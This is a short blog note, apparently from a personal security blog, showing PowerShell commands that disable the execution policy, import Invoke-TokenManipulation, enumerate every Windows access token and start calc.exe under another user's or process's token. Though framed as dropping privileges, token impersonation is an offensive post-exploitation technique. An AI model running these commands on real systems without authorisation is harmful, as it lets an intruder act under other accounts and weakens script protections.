Dropping privileges on Windows
Using Invoke-TokenManipulation to drop privileges
Enumerate all tokens
PS C:\Users\SMC> Get-ExecutionPolicy
Restricted
PS C:\Users\SMC> Set-ExecutionPolicy Unrestricted
PS C:\Users\SMC\Desktop> Import-Module .\Invoke-TokenManipulation.ps1
PS C:\Users\SMC\Desktop> Invoke-TokenManipulation -Enumerate
Drop privileges by specifying a username
Invoke-TokenManipulation -CreateProcess "calc.exe" -Username "DESKTOP-2SLO69L\keke"

Drop privileges by specifying a process
Invoke-TokenManipulation -CreateProcess "calc.exe" -Processid "4488"

--- --- --- --- From 小小leo's blog --- --- --- ---
